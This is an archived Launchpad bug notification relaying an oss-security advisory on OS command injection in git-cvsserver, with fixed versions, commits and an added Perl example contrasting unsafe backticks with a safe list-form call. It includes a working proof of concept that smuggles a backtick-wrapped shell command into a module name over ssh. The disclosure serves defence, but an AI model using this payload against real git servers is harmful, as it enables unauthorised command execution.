group.of.nepali.translators team mailing list archive

[Bug 1719740] Re: [DSA 3984-1] Git cvsserver OS Command Injection

 

** Bug watch added: Debian Bug tracker #876854
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=876854

** Also affects: git (Debian) via
   https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=876854
   Importance: Unknown
       Status: Unknown

-- 
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1719740

Title:
  [DSA 3984-1] Git cvsserver OS Command Injection

Status in git package in Ubuntu:
  In Progress
Status in git source package in Trusty:
  In Progress
Status in git source package in Xenial:
  In Progress
Status in git source package in Zesty:
  In Progress
Status in git source package in Artful:
  In Progress
Status in git package in Debian:
  Unknown

Bug description:
  From oss-security[1]:

  [ Authors ]
          joernchen       <joernchen () phenoelit de>

          Phenoelit Group (http://www.phenoelit.de)

  [ Affected Products ]
          Git before 2.14.2, 2.13.6, 2.12.5, 2.11.4 and 2.10.5 (git-cvsserver)
          https://git-scm.com

  [ Vendor communication ]
          2017-09-08 Sent vulnerability details to the git-security list
          2017-09-09 Acknowledgement of the issue, git maintainers ask if
                     a patch could be provided
          2017-09-10 Patch is provided
          2017-09-11 Further backtick operations are patched by the git
                     maintainers, corrections on the provided patch
          2017-09-11 Revised patch is sent out
          2017-09-11 Jeff King proposes to drop `git-cvsserver`'s default
                     invocation from `git-shell`
          2017-09-22 Draft release for git 2.14.2 is created including the
                     fixes
          2017-09-26 Release of this advisory, release of fixed git versions

  [ Description ]
          The `git` subcommand `cvsserver` is a Perl script which makes excessive
          use of the backtick operator to invoke `git`. Unfortunately user input
          is used within some of those invocations.

          It should be noted that `git-cvsserver` will be invoked by `git-shell`
          by default without further configuration.

  [ Example ]
          Below is an example of an OS Command Injection within `git-cvsserver`
          triggered via `git-shell`:

          =====8<=====
  [git@...t ~]$ cat .ssh/authorized_keys
  command="git-shell -c \"$SSH_ORIGINAL_COMMAND\"" ssh-rsa AAAAB3NzaC ....

  [joernchen@...t ~]$ ssh git@...alhost cvs server
  Root /tmp
  E /tmp/ does not seem to be a valid GIT repository
  E
  error 1 /tmp/ is not a valid repository
  Directory .
  `id>foooooo`
  add
  fatal: Not a git repository: '/tmp/'
  Invalid module '`id>foooooo`' at /usr/lib/git-core/git-cvsserver line 3807, <STDIN> line 4.
  [joernchen@...t ~]$

  [git@...t ~]$ cat foooooo
  uid=619(git) gid=618(git) groups=618(git)
  [git@...t ~]$
          =====>8=====

  [ Solution ]
          Upgrade to one of the following git versions:
          * 2.14.2
          * 2.13.6
          * 2.12.5
          * 2.11.4
          * 2.10.5

  [ end of file ]

  -------------------

  No CVE has been assigned yet, but a fix has been released upstream and
  as seen above, the fixes are already in Debian.

  The following upstream commits claim to fix the issue:
   - 985f59c042320ddf0a506e553d5eef9689ef4c32
   - 31add46823fe926e85efbfeab865e366018b33b4
   - 6d6e2f812d366789fb6f4f9ea8decb4777f6f862
   - dca89d4e56dde4b9b48d6f2ec093886a6fa46575

  [1] http://www.openwall.com/lists/oss-security/2017/09/26/9
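
The backtick pattern named in the advisory's description, shown beside a shell-free form, as an added illustration that is not part of the advisory and is not git's own code. Assumptions: `echo` stands in for the `git` invocation, the function names are hypothetical, and the input is a constructed, harmless marker.

```perl
#!/usr/bin/perl
# Added illustration; `echo` stands in for the `git` invocation (assumption).
use strict;
use warnings;

# Vulnerable pattern: backticks hand the interpolated string to /bin/sh -c,
# so a `...` sequence inside $module is expanded by the shell.
sub describe_unsafe {
    my ($module) = @_;
    my $out = `echo "module=$module"`;
    chomp $out;
    return $out;
}

# Hardened pattern: list-form pipe open execs the program directly with
# $module as a single argv element, so no shell ever parses it.
sub describe_safe {
    my ($module) = @_;
    open(my $fh, '-|', 'echo', "module=$module")
        or die "cannot run echo: $!";
    my $out = do { local $/; <$fh> };
    close($fh) or die "echo exited with status $?";
    $out = '' unless defined $out;
    chomp $out;
    return $out;
}

# Defence in depth: hypothetical allow-list for module names, checked
# before the value reaches any external command.
sub module_name_ok {
    my ($module) = @_;
    return $module =~ /\A[A-Za-z0-9][A-Za-z0-9._\/-]*\z/ ? 1 : 0;
}

# Constructed input: a harmless marker command wrapped in backticks.
my $input = '`echo EXPANDED-BY-SHELL`';

printf "unsafe: %s\n", describe_unsafe($input);
printf "safe:   %s\n", describe_safe($input);
printf "allow-list accepts input: %s\n", module_name_ok($input) ? 'yes' : 'no';
```

In the unsafe call the shell replaces the backtick sequence with the marker's output, while the list-form call returns the input byte for byte.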
